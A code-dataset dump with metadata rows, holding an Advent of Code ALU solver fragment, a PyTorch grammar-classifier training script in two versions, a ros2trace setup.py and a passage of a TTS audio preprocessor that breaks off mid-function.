alus = optimize(alus, t)
elif instruction == "add_value":
alus[arg_a] += arg_b
elif instruction == "mul_value":
alus[arg_a] *= arg_b
elif instruction == "mod_value":
alus[arg_a] %= arg_b
alus = optimize(alus, t)
elif instruction == "div_value":
alus[arg_a] = (alus[arg_a] / arg_b).astype(int)
alus = optimize(alus, t)
elif instruction == "eql_value":
alus[arg_a] = (alus[arg_a] == arg_b).astype(int)
alus = optimize(alus, t)
else:
alus = optimize(alus, t)
t.set_description(f"New input data. Increasing number of ALUs to {9 * len(alus)}")
alus["input"] *= 10
target_df = pd.DataFrame(columns=alus.columns)
for i in range(9, 0, -1) if search_max else range(1, 10):
new_df = alus.copy()
new_df["input"] += i
new_df[instruction[1]] = i
target_df = target_df.append(new_df)
alus = target_df
alus = optimize(alus, t)
valid_rows = alus[alus["z"] == 0]
print(f"Value: {valid_rows['input'].max() if search_max else valid_rows['input'].min()}")
def optimize(alus: pd.DataFrame, t) -> pd.DataFrame:
t.set_description(f"Optimizing {len(alus)} ALUs")
alus.drop_duplicates(subset=["w", "x", "y", "z"], inplace=True)
t.set_description(f"Working with {len(alus)} ALUs")
return alus
def parse_instructions(input_file: str) -> list[tuple[str, str] | tuple[str, str, str | int]]:
with open(input_file) as f:
lines = f.read().splitlines()
instructions = []
for line in lines:
instruction, *args = line.split()
if len(args) == 2:
arg_a, arg_b = args
if arg_b in "wxzy":
instructions.append((instruction, arg_a, arg_b))
else:
instructions.append((instruction + "_value", arg_a, int(arg_b)))
else:
instructions.append((instruction, args[0]))
return instructions
if __name__ == "__main__":
print(timeit.Timer(lambda: fire.Fire(main)).timeit(1))
| true | true |
1c332c9df7e7b1bcd442640eb38fe7704e22ec65 | 10,076 | py | Python | classifier/train.py | shivammehta007/NLPinEnglishLearning | ae869d868e39df9b1787134ba6e964acd385dd2e | [
"Apache-2.0"
] | 1 | 2020-05-27T22:21:33.000Z | 2020-05-27T22:21:33.000Z | classifier/train.py | shivammehta007/NLPinEnglishLearning | ae869d868e39df9b1787134ba6e964acd385dd2e | [
"Apache-2.0"
] | null | null | null | classifier/train.py | shivammehta007/NLPinEnglishLearning | ae869d868e39df9b1787134ba6e964acd385dd2e | [
"Apache-2.0"
] | null | null | null | """
Training script for the model
"""
import argparse
import logging
import os
import time
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm.auto import tqdm
from config.hyperparameters import (
BATCH_SIZE,
BIDIRECTION,
DROPOUT,
EMBEDDING_DIM,
EPOCHS,
FREEZE_EMBEDDINGS,
HIDDEN_DIM,
LR,
N_LAYERS,
WEIGHT_DECAY,
CNN_N_FILTER,
CNN_FILTER_SIZES,
LINEAR_HIDDEN_DIM,
)
from config.root import (
LOGGING_FORMAT,
LOGGING_LEVEL,
TRAINED_CLASSIFIER_FOLDER,
TRAINED_CLASSIFIER_RNNHIDDEN,
device,
seed_all,
SEED,
)
from datasetloader import GrammarDasetMultiTag, GrammarDasetAnswerTag
from helperfunctions import evaluate, train, train_tag_model, evaluate_tag_model
from model import (
RNNHiddenClassifier,
RNNMaxpoolClassifier,
CNN2dClassifier,
CNN1dClassifier,
RNNFieldClassifer,
CNN1dExtraLayerClassifier,
)
from utility import categorical_accuracy, epoch_time
# Initialize logger for this file; level/format come from config.root so all
# modules share one logging configuration.
logger = logging.getLogger(__name__)
logging.basicConfig(level=LOGGING_LEVEL, format=LOGGING_FORMAT)
def count_parameters(model):
    """Return the number of trainable (requires_grad=True) parameters in *model*."""
    total = 0
    for parameter in model.parameters():
        if parameter.requires_grad:
            total += parameter.numel()
    return total
def initialize_new_model(
    classifier_type,
    dataset,
    embedding_dim,
    hidden_dim,
    n_layers,
    bidirectional,
    dropout,
    freeze_embeddings,
    dataset_tag,
    linear_hidden_dim,
):
    """Build a freshly initialized classifier with pretrained embeddings.

    Args:
        classifier_type: Name of the model class to instantiate (see the
            if/elif chain below for accepted values).
        dataset: Loaded GrammarDaset* object; supplies vocab, pad/unk
            indices, pretrained vectors and the label vocabulary.
        embedding_dim: Dimensionality of the word embeddings.
        hidden_dim: RNN hidden size (ignored by the CNN variants).
        n_layers: Number of RNN layers (ignored by the CNN variants).
        bidirectional: Whether RNN variants run in both directions.
        dropout: Dropout probability.
        freeze_embeddings: Truthy -> embedding weights are not trained.
        dataset_tag: "multi" uses dataset.question's vocab, anything else
            uses dataset.text's.
        linear_hidden_dim: Hidden size of the extra linear layer
            (CNN1dExtraLayerClassifier only).

    Returns:
        The constructed model with pretrained embeddings copied in and the
        <unk>/<pad> rows zeroed.

    Raises:
        TypeError: If classifier_type matches none of the known names.
    """
    logger.debug("Initializing Model")

    # Pick vocabulary metadata from the field that carries the text for
    # this dataset flavor.
    if dataset_tag == "multi":
        VOCAB_SIZE = len(dataset.question.vocab)
        PAD_IDX = dataset.question.vocab.stoi[dataset.question.pad_token]
        pretrained_embeddings = dataset.question.vocab.vectors
        UNK_IDX = dataset.question.vocab.stoi[dataset.question.unk_token]
    else:
        VOCAB_SIZE = len(dataset.text.vocab)
        PAD_IDX = dataset.text.vocab.stoi[dataset.text.pad_token]
        pretrained_embeddings = dataset.text.vocab.vectors
        UNK_IDX = dataset.text.vocab.stoi[dataset.text.unk_token]

    OUTPUT_LAYERS = len(dataset.label.vocab)

    if classifier_type == "RNNHiddenClassifier":
        model = RNNHiddenClassifier(
            VOCAB_SIZE,
            embedding_dim,
            hidden_dim,
            OUTPUT_LAYERS,
            n_layers,
            bidirectional,
            dropout,
            PAD_IDX,
        )
    elif classifier_type == "RNNMaxpoolClassifier":
        model = RNNMaxpoolClassifier(
            VOCAB_SIZE,
            embedding_dim,
            hidden_dim,
            OUTPUT_LAYERS,
            n_layers,
            bidirectional,
            dropout,
            PAD_IDX,
        )
    elif classifier_type == "CNN2dClassifier":
        model = CNN2dClassifier(
            VOCAB_SIZE,
            embedding_dim,
            CNN_N_FILTER,
            CNN_FILTER_SIZES,
            OUTPUT_LAYERS,
            dropout,
            PAD_IDX,
        )
    elif classifier_type == "CNN1dClassifier":
        model = CNN1dClassifier(
            VOCAB_SIZE,
            embedding_dim,
            CNN_N_FILTER,
            CNN_FILTER_SIZES,
            OUTPUT_LAYERS,
            dropout,
            PAD_IDX,
        )
    # NOTE(review): spelled "RNNFieldClassifer" (sic) -- must match the CLI
    # value exactly; the CLI also offers "RNNFieldClassifier" (full
    # spelling), which falls through to the TypeError below.  Confirm and
    # reconcile the two spellings.
    elif classifier_type == "RNNFieldClassifer":
        model = RNNFieldClassifer(
            VOCAB_SIZE,
            embedding_dim,
            hidden_dim,
            OUTPUT_LAYERS,
            n_layers,
            bidirectional,
            dropout,
            PAD_IDX,
            dataset.tags,
        )
    elif classifier_type == "CNN1dExtraLayerClassifier":
        model = CNN1dExtraLayerClassifier(
            VOCAB_SIZE,
            embedding_dim,
            CNN_N_FILTER,
            CNN_FILTER_SIZES,
            linear_hidden_dim,
            OUTPUT_LAYERS,
            dropout,
            PAD_IDX,
        )
    else:
        raise TypeError("Invalid Classifier selected")

    if freeze_embeddings:
        # Freezing is done by turning off gradients on the embedding matrix.
        model.embedding.weight.requires_grad = False
        logger.debug(
            "Freeze Embeddings Value {}: {}".format(
                freeze_embeddings, model.embedding.weight.requires_grad
            )
        )

    logger.info(
        "Model Initialized with {:,} trainiable parameters".format(
            count_parameters(model)
        )
    )

    # Initialize pretrained word embeddings
    model.embedding.weight.data.copy_(pretrained_embeddings)

    # Initialize Padding and Unknown as 0
    model.embedding.weight.data[UNK_IDX] = torch.zeros(embedding_dim)
    model.embedding.weight.data[PAD_IDX] = torch.zeros(embedding_dim)

    logger.debug("Copied PreTrained Embeddings")

    return model
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Utility to train the Model")
    parser.add_argument(
        "-s",
        "--seed",
        default=SEED,
        help="Set custom seed for reproducibility",
        type=int,
    )
    parser.add_argument(
        "-loc",
        "--model-location",
        default=None,
        help="Give an already trained model location to use and train more epochs on it",
    )
    # NOTE(review): type=bool on a CLI flag is an argparse footgun --
    # bool("False") is True, so any non-empty value enables it.  Confirm
    # intended usage before changing.
    parser.add_argument(
        "-b",
        "--bidirectional",
        default=BIDIRECTION,
        help="Makes the model Bidirectional",
        type=bool,
    )
    parser.add_argument(
        "-d",
        "--dropout",
        default=DROPOUT,
        help="Dropout count for the model",
        type=float,
    )
    parser.add_argument(
        "-e",
        "--embedding-dim",
        default=EMBEDDING_DIM,
        help="Embedding Dimensions",
        type=int,
    )
    parser.add_argument(
        "-hd",
        "--hidden-dim",
        default=HIDDEN_DIM,
        help="Hidden dimensions of the RNN",
        type=int,
    )
    parser.add_argument(
        "-l", "--n-layers", default=N_LAYERS, help="Number of layers in RNN", type=int
    )
    parser.add_argument(
        "-lr",
        "--learning-rate",
        default=LR,
        help="Learning rate of Adam Optimizer",
        type=float,
    )
    parser.add_argument(
        "-n",
        "--epochs",
        default=EPOCHS,
        help="Number of Epochs to train model",
        type=int,
    )
    parser.add_argument(
        "-batch",
        "--batch_size",
        default=BATCH_SIZE,
        help="Number of Epochs to train model",
        type=int,
    )
    parser.add_argument(
        "-f",
        "--freeze-embeddings",
        default=FREEZE_EMBEDDINGS,
        help="Freeze Embeddings of Model",
        type=int,
    )
    parser.add_argument(
        "-t",
        "--tag",
        default="answeronly",
        choices=["multi", "answeronly"],
        help="Use two different dataset type, multi type and Answer only",
    )
    parser.add_argument(
        "-l2",
        "--l2-regularization",
        default=WEIGHT_DECAY,
        help="Value of alpha in l2 regularization 0 means no regularization ",
        type=float,
    )
    # NOTE(review): both "RNNFieldClassifier" and the misspelled
    # "RNNFieldClassifer" are offered; initialize_new_model only matches the
    # misspelled form, so the correct spelling raises TypeError -- confirm.
    parser.add_argument(
        "-m",
        "--model",
        default="RNNHiddenClassifier",
        choices=[
            "RNNHiddenClassifier",
            "RNNMaxpoolClassifier",
            "RNNFieldClassifier",
            "CNN2dClassifier",
            "CNN1dClassifier",
            "RNNFieldClassifer",
            "CNN1dExtraLayerClassifier",
        ],
        help="select the classifier to train on",
    )
    parser.add_argument(
        "-lhd",
        "--linear-hidden-dim",
        default=LINEAR_HIDDEN_DIM,
        help="Freeze Embeddings of Model",
        type=int,
    )

    args = parser.parse_args()

    # Seed all RNGs for reproducibility before any data/model construction.
    seed_all(args.seed)
    logger.debug(args)
    logger.debug("Custom seed set with: {}".format(args.seed))

    logger.info("Loading Dataset")
    if args.tag == "multi":
        dataset = GrammarDasetMultiTag.get_iterators(args.batch_size)
    else:
        dataset = GrammarDasetAnswerTag.get_iterators(args.batch_size)
    logger.info("Dataset Loaded Successfully")

    # Either resume from a saved model file or build a fresh one.
    if args.model_location:
        model = torch.load(args.model_location)
    else:
        model = initialize_new_model(
            args.model,
            dataset,
            args.embedding_dim,
            args.hidden_dim,
            args.n_layers,
            args.bidirectional,
            args.dropout,
            args.freeze_embeddings,
            args.tag,
            args.linear_hidden_dim,
        )
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(
model.parameters(), lr=LR, weight_decay=args.l2_regularization
)
    model = model.to(device)
    criterion = criterion.to(device)
    logger.info(model)

    if not os.path.exists(TRAINED_CLASSIFIER_FOLDER):
        os.mkdir(TRAINED_CLASSIFIER_FOLDER)

    # Track the best test loss so only the best checkpoint is kept.
    best_test_loss = float("inf")
    for epoch in range(int(args.epochs)):
        start_time = time.time()

        # NOTE(review): matches the misspelled "RNNFieldClassifer" CLI value,
        # consistent with initialize_new_model -- confirm spelling intent.
        if args.model == "RNNFieldClassifer":
            train_loss, train_acc = train_tag_model(
                model, dataset.train_iterator, optimizer, criterion, dataset.tags
            )
            test_loss, test_acc = evaluate_tag_model(
                model, dataset.test_iterator, criterion, dataset.tags
            )
        else:
            train_loss, train_acc = train(
                model, dataset.train_iterator, optimizer, criterion, args.tag
            )
            test_loss, test_acc = evaluate(
                model, dataset.test_iterator, criterion, args.tag
            )

        end_time = time.time()
        epoch_mins, epoch_secs = epoch_time(start_time, end_time)

        # Checkpoint whenever the test loss improves.
        if test_loss < best_test_loss:
            best_test_loss = test_loss
            torch.save(
                model,
                os.path.join(TRAINED_CLASSIFIER_FOLDER, TRAINED_CLASSIFIER_RNNHIDDEN),
            )

        print(f"Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s")
        print(f"\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%")
        print(f"\t Val. Loss: {test_loss:.3f} | Val. Acc: {test_acc*100:.2f}%")
| 26.308094 | 98 | 0.599047 | import argparse
import logging
import os
import time
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm.auto import tqdm
from config.hyperparameters import (
BATCH_SIZE,
BIDIRECTION,
DROPOUT,
EMBEDDING_DIM,
EPOCHS,
FREEZE_EMBEDDINGS,
HIDDEN_DIM,
LR,
N_LAYERS,
WEIGHT_DECAY,
CNN_N_FILTER,
CNN_FILTER_SIZES,
LINEAR_HIDDEN_DIM,
)
from config.root import (
LOGGING_FORMAT,
LOGGING_LEVEL,
TRAINED_CLASSIFIER_FOLDER,
TRAINED_CLASSIFIER_RNNHIDDEN,
device,
seed_all,
SEED,
)
from datasetloader import GrammarDasetMultiTag, GrammarDasetAnswerTag
from helperfunctions import evaluate, train, train_tag_model, evaluate_tag_model
from model import (
RNNHiddenClassifier,
RNNMaxpoolClassifier,
CNN2dClassifier,
CNN1dClassifier,
RNNFieldClassifer,
CNN1dExtraLayerClassifier,
)
from utility import categorical_accuracy, epoch_time
logger = logging.getLogger(__name__)
logging.basicConfig(level=LOGGING_LEVEL, format=LOGGING_FORMAT)
def count_parameters(model):
    """Return the number of trainable parameters (``requires_grad=True``)."""
    total = 0
    for param in model.parameters():
        if param.requires_grad:
            total += param.numel()
    return total
def initialize_new_model(
    classifier_type,
    dataset,
    embedding_dim,
    hidden_dim,
    n_layers,
    bidirectional,
    dropout,
    freeze_embeddings,
    dataset_tag,
    linear_hidden_dim,
):
    """Build a fresh classifier and load pretrained embeddings into it.

    Args:
        classifier_type: name of the model class to instantiate; must match
            one of the branches below, otherwise ``TypeError`` is raised.
        dataset: loaded dataset providing the vocab fields and label vocab.
        embedding_dim / hidden_dim / n_layers / bidirectional / dropout:
            architecture hyper-parameters forwarded to the model class.
        freeze_embeddings: truthy -> embedding weights are frozen.
        dataset_tag: "multi" selects the ``question`` field vocab, anything
            else the ``text`` field vocab.
        linear_hidden_dim: hidden size of the extra linear layer (only used
            by CNN1dExtraLayerClassifier).

    Returns:
        The initialised model with pretrained vectors copied in and the
        UNK/PAD embedding rows zeroed.
    """
    logger.debug("Initializing Model")
    # The vocabulary lives on a different dataset field depending on the
    # dataset flavour ("multi" vs answer-only).
    if dataset_tag == "multi":
        VOCAB_SIZE = len(dataset.question.vocab)
        PAD_IDX = dataset.question.vocab.stoi[dataset.question.pad_token]
        pretrained_embeddings = dataset.question.vocab.vectors
        UNK_IDX = dataset.question.vocab.stoi[dataset.question.unk_token]
    else:
        VOCAB_SIZE = len(dataset.text.vocab)
        PAD_IDX = dataset.text.vocab.stoi[dataset.text.pad_token]
        pretrained_embeddings = dataset.text.vocab.vectors
        UNK_IDX = dataset.text.vocab.stoi[dataset.text.unk_token]
    OUTPUT_LAYERS = len(dataset.label.vocab)
    # Dispatch on the classifier name.  NOTE: "RNNFieldClassifer" (sic)
    # matches the imported class's spelling.
    if classifier_type == "RNNHiddenClassifier":
        model = RNNHiddenClassifier(
            VOCAB_SIZE,
            embedding_dim,
            hidden_dim,
            OUTPUT_LAYERS,
            n_layers,
            bidirectional,
            dropout,
            PAD_IDX,
        )
    elif classifier_type == "RNNMaxpoolClassifier":
        model = RNNMaxpoolClassifier(
            VOCAB_SIZE,
            embedding_dim,
            hidden_dim,
            OUTPUT_LAYERS,
            n_layers,
            bidirectional,
            dropout,
            PAD_IDX,
        )
    elif classifier_type == "CNN2dClassifier":
        model = CNN2dClassifier(
            VOCAB_SIZE,
            embedding_dim,
            CNN_N_FILTER,
            CNN_FILTER_SIZES,
            OUTPUT_LAYERS,
            dropout,
            PAD_IDX,
        )
    elif classifier_type == "CNN1dClassifier":
        model = CNN1dClassifier(
            VOCAB_SIZE,
            embedding_dim,
            CNN_N_FILTER,
            CNN_FILTER_SIZES,
            OUTPUT_LAYERS,
            dropout,
            PAD_IDX,
        )
    elif classifier_type == "RNNFieldClassifer":
        model = RNNFieldClassifer(
            VOCAB_SIZE,
            embedding_dim,
            hidden_dim,
            OUTPUT_LAYERS,
            n_layers,
            bidirectional,
            dropout,
            PAD_IDX,
            dataset.tags,
        )
    elif classifier_type == "CNN1dExtraLayerClassifier":
        model = CNN1dExtraLayerClassifier(
            VOCAB_SIZE,
            embedding_dim,
            CNN_N_FILTER,
            CNN_FILTER_SIZES,
            linear_hidden_dim,
            OUTPUT_LAYERS,
            dropout,
            PAD_IDX,
        )
    else:
        raise TypeError("Invalid Classifier selected")
    if freeze_embeddings:
        # Stop gradient updates to the embedding table.
        model.embedding.weight.requires_grad = False
    logger.debug(
        "Freeze Embeddings Value {}: {}".format(
            freeze_embeddings, model.embedding.weight.requires_grad
        )
    )
    logger.info(
        "Model Initialized with {:,} trainiable parameters".format(
            count_parameters(model)
        )
    )
    # Seed the embedding layer with pretrained vectors; zero UNK and PAD so
    # they start as neutral embeddings.
    model.embedding.weight.data.copy_(pretrained_embeddings)
    model.embedding.weight.data[UNK_IDX] = torch.zeros(embedding_dim)
    model.embedding.weight.data[PAD_IDX] = torch.zeros(embedding_dim)
    logger.debug("Copied PreTrained Embeddings")
    return model
if __name__ == "__main__":
    # CLI entry point: parse hyper-parameters, build (or reload) a
    # classifier, train it, and checkpoint the best model by validation loss.
    parser = argparse.ArgumentParser(description="Utility to train the Model")
    parser.add_argument(
        "-s",
        "--seed",
        default=SEED,
        help="Set custom seed for reproducibility",
        type=int,
    )
    parser.add_argument(
        "-loc",
        "--model-location",
        default=None,
        help="Give an already trained model location to use and train more epochs on it",
    )
    # NOTE(review): type=bool treats ANY non-empty string (even "False") as
    # True; consider a real str-to-bool parser or action="store_true".
    parser.add_argument(
        "-b",
        "--bidirectional",
        default=BIDIRECTION,
        help="Makes the model Bidirectional",
        type=bool,
    )
    parser.add_argument(
        "-d",
        "--dropout",
        default=DROPOUT,
        help="Dropout count for the model",
        type=float,
    )
    parser.add_argument(
        "-e",
        "--embedding-dim",
        default=EMBEDDING_DIM,
        help="Embedding Dimensions",
        type=int,
    )
    parser.add_argument(
        "-hd",
        "--hidden-dim",
        default=HIDDEN_DIM,
        help="Hidden dimensions of the RNN",
        type=int,
    )
    parser.add_argument(
        "-l", "--n-layers", default=N_LAYERS, help="Number of layers in RNN", type=int
    )
    parser.add_argument(
        "-lr",
        "--learning-rate",
        default=LR,
        help="Learning rate of Adam Optimizer",
        type=float,
    )
    parser.add_argument(
        "-n",
        "--epochs",
        default=EPOCHS,
        help="Number of Epochs to train model",
        type=int,
    )
    parser.add_argument(
        "-batch",
        "--batch_size",
        default=BATCH_SIZE,
        # BUG FIX: help text was copy-pasted from --epochs.
        help="Batch size used for training",
        type=int,
    )
    parser.add_argument(
        "-f",
        "--freeze-embeddings",
        default=FREEZE_EMBEDDINGS,
        help="Freeze Embeddings of Model",
        type=int,
    )
    parser.add_argument(
        "-t",
        "--tag",
        default="answeronly",
        choices=["multi", "answeronly"],
        help="Use two different dataset type, multi type and Answer only",
    )
    parser.add_argument(
        "-l2",
        "--l2-regularization",
        default=WEIGHT_DECAY,
        help="Value of alpha in l2 regularization 0 means no regularization ",
        type=float,
    )
    # NOTE(review): both "RNNFieldClassifier" and "RNNFieldClassifer" (sic)
    # are offered, but only the latter is handled by initialize_new_model();
    # selecting the former raises TypeError at model construction.
    parser.add_argument(
        "-m",
        "--model",
        default="RNNHiddenClassifier",
        choices=[
            "RNNHiddenClassifier",
            "RNNMaxpoolClassifier",
            "RNNFieldClassifier",
            "CNN2dClassifier",
            "CNN1dClassifier",
            "RNNFieldClassifer",
            "CNN1dExtraLayerClassifier",
        ],
        help="select the classifier to train on",
    )
    parser.add_argument(
        "-lhd",
        "--linear-hidden-dim",
        default=LINEAR_HIDDEN_DIM,
        # BUG FIX: help text was copy-pasted from --freeze-embeddings.
        help="Hidden dimension of the extra linear layer (CNN1dExtraLayerClassifier)",
        type=int,
    )
    args = parser.parse_args()
    seed_all(args.seed)
    logger.debug(args)
    logger.debug("Custom seed set with: {}".format(args.seed))
    logger.info("Loading Dataset")
    if args.tag == "multi":
        dataset = GrammarDasetMultiTag.get_iterators(args.batch_size)
    else:
        dataset = GrammarDasetAnswerTag.get_iterators(args.batch_size)
    logger.info("Dataset Loaded Successfully")
    if args.model_location:
        # Resume training from a previously saved model checkpoint.
        model = torch.load(args.model_location)
    else:
        model = initialize_new_model(
            args.model,
            dataset,
            args.embedding_dim,
            args.hidden_dim,
            args.n_layers,
            args.bidirectional,
            args.dropout,
            args.freeze_embeddings,
            args.tag,
            args.linear_hidden_dim,
        )
    criterion = nn.CrossEntropyLoss()
    # BUG FIX: previously `lr=LR` hard-coded the default and silently
    # ignored the --learning-rate flag (note weight_decay already used the
    # parsed args value).
    optimizer = optim.Adam(
        model.parameters(), lr=args.learning_rate, weight_decay=args.l2_regularization
    )
    model = model.to(device)
    criterion = criterion.to(device)
    logger.info(model)
    if not os.path.exists(TRAINED_CLASSIFIER_FOLDER):
        os.mkdir(TRAINED_CLASSIFIER_FOLDER)
    best_test_loss = float("inf")
    for epoch in range(int(args.epochs)):
        start_time = time.time()
        # The field classifier threads the tag fields through dedicated
        # train/eval helpers; everything else uses the generic ones.
        if args.model == "RNNFieldClassifer":
            train_loss, train_acc = train_tag_model(
                model, dataset.train_iterator, optimizer, criterion, dataset.tags
            )
            test_loss, test_acc = evaluate_tag_model(
                model, dataset.test_iterator, criterion, dataset.tags
            )
        else:
            train_loss, train_acc = train(
                model, dataset.train_iterator, optimizer, criterion, args.tag
            )
            test_loss, test_acc = evaluate(
                model, dataset.test_iterator, criterion, args.tag
            )
        end_time = time.time()
        epoch_mins, epoch_secs = epoch_time(start_time, end_time)
        if test_loss < best_test_loss:
            best_test_loss = test_loss
            # NOTE(review): every model type is checkpointed under the
            # RNNHIDDEN filename -- confirm this is intended.
            torch.save(
                model,
                os.path.join(TRAINED_CLASSIFIER_FOLDER, TRAINED_CLASSIFIER_RNNHIDDEN),
            )
        print(f"Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s")
        print(f"\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%")
        print(f"\t Val. Loss: {test_loss:.3f} | Val. Acc: {test_acc*100:.2f}%")
| true | true |
1c332df2de45291065787fb30c0fb88048124ea9 | 1,161 | py | Python | ros2trace/setup.py | hliberacki/ros2_tracing | c0a3512137382bd97c5a013526d3d4f59f58c165 | [
"Apache-2.0"
] | null | null | null | ros2trace/setup.py | hliberacki/ros2_tracing | c0a3512137382bd97c5a013526d3d4f59f58c165 | [
"Apache-2.0"
] | null | null | null | ros2trace/setup.py | hliberacki/ros2_tracing | c0a3512137382bd97c5a013526d3d4f59f58c165 | [
"Apache-2.0"
] | null | null | null | from setuptools import find_packages
from setuptools import setup
# Package metadata for the `ros2 trace` command plugin.
package_name = 'ros2trace'

setup(
    name=package_name,
    version='4.0.0',
    packages=find_packages(exclude=['test']),
    # Install package.xml and register the package in the ament resource
    # index so ROS 2 tooling can discover it.
    data_files=[
        ('share/' + package_name, ['package.xml']),
        ('share/ament_index/resource_index/packages',
            ['resource/' + package_name]),
    ],
    install_requires=['ros2cli'],
    zip_safe=True,
    maintainer=(
        'Christophe Bedard, '
        'Ingo Lütkebohle'
    ),
    maintainer_email=(
        'bedard.christophe@gmail.com, '
        'ingo.luetkebohle@de.bosch.com'
    ),
    author='Christophe Bedard',
    author_email='fixed-term.christophe.bourquebedard@de.bosch.com',
    url='https://gitlab.com/ros-tracing/ros2_tracing',
    keywords=[],
    description='The trace command for ROS 2 command line tools.',
    long_description=(
        'The package provides the trace command '
        'for the ROS 2 command line tools.'
    ),
    license='Apache 2.0',
    tests_require=['pytest'],
    # Expose `ros2 trace` as a ros2cli sub-command via the plugin entry point.
    entry_points={
        'ros2cli.command': [
            f'trace = {package_name}.command.trace:TraceCommand',
        ],
    }
)
| 27.642857 | 68 | 0.625323 | from setuptools import find_packages
from setuptools import setup
package_name = 'ros2trace'
setup(
name=package_name,
version='4.0.0',
packages=find_packages(exclude=['test']),
data_files=[
('share/' + package_name, ['package.xml']),
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
],
install_requires=['ros2cli'],
zip_safe=True,
maintainer=(
'Christophe Bedard, '
'Ingo Lütkebohle'
),
maintainer_email=(
'bedard.christophe@gmail.com, '
'ingo.luetkebohle@de.bosch.com'
),
author='Christophe Bedard',
author_email='fixed-term.christophe.bourquebedard@de.bosch.com',
url='https://gitlab.com/ros-tracing/ros2_tracing',
keywords=[],
description='The trace command for ROS 2 command line tools.',
long_description=(
'The package provides the trace command '
'for the ROS 2 command line tools.'
),
license='Apache 2.0',
tests_require=['pytest'],
entry_points={
'ros2cli.command': [
f'trace = {package_name}.command.trace:TraceCommand',
],
}
)
| true | true |
1c332e26d923bffec6844f1832e10218c0d0b55e | 4,277 | py | Python | preprocessor/preprocessor.py | thepowerfuldeez/VAENAR-TTS | 7ee40a5511118491269102bc6874a51c1d9959ee | [
"MIT"
] | null | null | null | preprocessor/preprocessor.py | thepowerfuldeez/VAENAR-TTS | 7ee40a5511118491269102bc6874a51c1d9959ee | [
"MIT"
] | null | null | null | preprocessor/preprocessor.py | thepowerfuldeez/VAENAR-TTS | 7ee40a5511118491269102bc6874a51c1d9959ee | [
"MIT"
] | null | null | null | import os
import random
import json
import tgt
import librosa
import numpy as np
from tqdm import tqdm
import audio as Audio
from text import grapheme_to_phoneme
from utils.tools import read_lexicon
from g2p_en import G2p
random.seed(1234)
class Preprocessor:
    """Turn raw speaker wav/lab data into mel spectrograms and metadata.

    Expects ``raw_path`` laid out as ``<speaker>/<basename>.wav`` with a
    matching ``<basename>.lab`` transcript, and writes mel ``.npy`` files,
    ``speakers.json`` and ``train.txt`` / ``val.txt`` under
    ``preprocessed_path``.
    """

    def __init__(self, config):
        # Paths and preprocessing hyper-parameters pulled from the config dict.
        self.config = config
        self.in_dir = config["path"]["raw_path"]
        self.out_dir = config["path"]["preprocessed_path"]
        self.val_size = config["preprocessing"]["val_size"]
        self.sampling_rate = config["preprocessing"]["audio"]["sampling_rate"]
        self.skip_len = config["preprocessing"]["audio"]["skip_len"]
        self.trim_top_db = config["preprocessing"]["audio"]["trim_top_db"]
        self.filter_length = config["preprocessing"]["stft"]["filter_length"]
        self.hop_length = config["preprocessing"]["stft"]["hop_length"]
        # Grapheme-to-phoneme converter plus pronunciation lexicon.
        self.g2p = G2p()
        self.lexicon = read_lexicon(config["path"]["lexicon_path"])
        self.STFT = Audio.stft.TacotronSTFT(
            config["preprocessing"]["stft"]["filter_length"],
            config["preprocessing"]["stft"]["hop_length"],
            config["preprocessing"]["stft"]["win_length"],
            config["preprocessing"]["mel"]["n_mel_channels"],
            config["preprocessing"]["audio"]["sampling_rate"],
            config["preprocessing"]["mel"]["mel_fmin"],
            config["preprocessing"]["mel"]["mel_fmax"],
        )

    def build_from_path(self):
        """Process every utterance under ``in_dir`` and return shuffled metadata.

        Side effects: writes per-utterance mel ``.npy`` files,
        ``speakers.json`` (speaker name -> integer id), and splits the
        shuffled metadata into ``val.txt`` (first ``val_size`` entries) and
        ``train.txt`` (the rest).
        """
        os.makedirs((os.path.join(self.out_dir, "mel")), exist_ok=True)
        print("Processing Data ...")
        out = list()
        n_frames = 0
        # Compute pitch, energy, duration, and mel-spectrogram
        speakers = {}
        for i, speaker in enumerate(tqdm(os.listdir(self.in_dir))):
            speakers[speaker] = i  # speaker name -> integer id
            for wav_name in tqdm(os.listdir(os.path.join(self.in_dir, speaker))):
                if ".wav" not in wav_name:
                    continue
                basename = wav_name.split(".")[0]
                ret = self.process_utterance(speaker, basename)
                if ret is None:
                    # Utterance skipped (audio shorter than skip_len).
                    continue
                else:
                    info, n = ret
                    out.append(info)
                    n_frames += n
        # Save files
        with open(os.path.join(self.out_dir, "speakers.json"), "w") as f:
            f.write(json.dumps(speakers))
        print(
            "Total time: {} hours".format(
                n_frames * self.hop_length / self.sampling_rate / 3600
            )
        )
        random.shuffle(out)
        out = [r for r in out if r is not None]
        # Write metadata
        with open(os.path.join(self.out_dir, "train.txt"), "w", encoding="utf-8") as f:
            for m in out[self.val_size :]:
                f.write(m + "\n")
        with open(os.path.join(self.out_dir, "val.txt"), "w", encoding="utf-8") as f:
            for m in out[: self.val_size]:
                f.write(m + "\n")
        return out

    def process_utterance(self, speaker, basename):
        """Compute and save the mel spectrogram for a single utterance.

        Returns a ``("basename|speaker|{phones}|raw_text", n_frames)`` tuple,
        or ``None`` when the audio is shorter than ``skip_len``.
        """
        wav_path = os.path.join(self.in_dir, speaker, "{}.wav".format(basename))
        text_path = os.path.join(self.in_dir, speaker, "{}.lab".format(basename))
        # Read and trim wav files
        # NOTE(review): librosa.load() without sr= resamples to librosa's
        # default rate rather than the configured sampling_rate -- confirm
        # this is intended.
        wav, _ = librosa.load(wav_path)
        wav = wav.astype(np.float32)
        if len(wav) < self.skip_len:
            return None
        wav = librosa.effects.trim(wav, top_db=self.trim_top_db, frame_length=self.filter_length, hop_length=self.hop_length)[0]
        # Compute mel-scale spectrogram
        mel_spectrogram, _ = Audio.stft.get_mel_spectrogram(self.STFT, wav)
        mel_spectrogram = mel_spectrogram.squeeze(1).numpy()
        # Read raw text
        with open(text_path, "r") as f:
            raw_text = f.readline().strip("\n")
        # Get phoneme
        phone = grapheme_to_phoneme(raw_text, self.g2p, self.lexicon)
        text = "{" + " ".join(phone) + "}"
        # Save files
